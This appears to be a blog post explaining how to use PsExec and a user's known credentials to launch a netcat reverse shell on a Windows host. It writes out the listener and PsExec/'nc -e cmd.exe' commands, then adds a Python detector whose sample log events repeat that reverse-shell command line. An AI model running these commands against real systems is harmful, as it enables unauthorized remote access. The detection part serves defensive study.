First, obviously, you need the user's credentials; for this example the username is "tom", the password is "iamtom", and the hostname is "TOMSCOMP".

Second, you need PsExec.exe on your attacking machine and nc.exe already present on the target system (the PsExec command below runs it from a path on the target).

You will need to start a listener on your attacking machine like so:

nc -lvp 8080
Next, use PsExec.exe with the credentials of the user you want to intrude as to execute nc.exe on the remote host. My command looked like this:

PsExec -u tom -p iamtom \\TOMSCOMP C:\path\to\nc.exe IP_OF_ATTACKING_SYSTEM 8080 -e C:\windows\system32\cmd.exe
This spawned a netcat reverse TCP shell that connected back to my attacking machine on port 8080, giving me a cmd prompt running as tom! Hopefully you found this interesting. I have seen a lot of frustration around the situation where one has credentials but can't seem to escalate with just a layer 4 shell. To a Windows guru this is probably very basic, but to someone like me who grew up on Linux this is a beautiful find!
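For the defensive side of the same chain, here is an added example (not from the original post) that flags PsExec's default service installation and a netcat process launched with "-e ... cmd.exe" in host logs. The record layout is a simplified stand-in for Windows System log and Sysmon events, and the host, user, paths and the 203.0.113.5 address are constructed for the example.

```python
import re

# Constructed, simplified records in the shape of a Windows System log
# service-install event (ID 7045) and Sysmon process-creation events (ID 1).
# Host, user, paths and the 203.0.113.5 address are invented for this example.
SAMPLE_EVENTS = [
    {"host": "TOMSCOMP", "event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "TOMSCOMP", "event_id": 1, "user": "TOMSCOMP\\tom",
     "parent_image": r"C:\Windows\PSEXESVC.exe", "image": r"C:\path\to\nc.exe",
     "command_line": r"C:\path\to\nc.exe 203.0.113.5 8080 -e C:\windows\system32\cmd.exe"},
    {"host": "TOMSCOMP", "event_id": 1, "user": "TOMSCOMP\\tom",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]

NETCAT_NAMES = ("nc.exe", "nc64.exe", "ncat.exe", "netcat.exe")
# "-e <program>" tells netcat to hand the connection to that program;
# a cmd.exe argument is the reverse-shell signature used in the post.
SHELL_ARG = re.compile(r"\s-e\s+\S*cmd\.exe")


def is_psexec_service_install(ev):
    """PsExec installs a service named PSEXESVC on the target by default."""
    return ev.get("event_id") == 7045 and ev.get("service_name", "").upper() == "PSEXESVC"


def is_netcat_shell(ev):
    """Process creation of a netcat binary that binds cmd.exe to its socket."""
    if ev.get("event_id") != 1:
        return False
    image = ev.get("image", "").lower()
    return image.endswith(NETCAT_NAMES) and SHELL_ARG.search(ev.get("command_line", "").lower()) is not None


def spawned_by_psexec(ev):
    """Parent is the PsExec service executable (named after the service, PSEXESVC by default)."""
    return ev.get("parent_image", "").lower().endswith("psexesvc.exe")


def find_psexec_reverse_shells(events):
    """Return one finding per netcat shell on a host that also shows PsExec activity."""
    psexec_hosts = {ev["host"] for ev in events if is_psexec_service_install(ev)}
    findings = []
    for ev in events:
        if is_netcat_shell(ev) and (spawned_by_psexec(ev) or ev["host"] in psexec_hosts):
            findings.append({"host": ev["host"], "user": ev.get("user"),
                             "command_line": ev["command_line"]})
    return findings


if __name__ == "__main__":
    for hit in find_psexec_reverse_shells(SAMPLE_EVENTS):
        print(f"ALERT {hit['host']} {hit['user']}: {hit['command_line']}")
```

PsExec's -r switch renames both the service and its executable, so the service-name and parent-process checks are only the default-case signals; the netcat "-e cmd.exe" pattern is the part of the chain that survives that change.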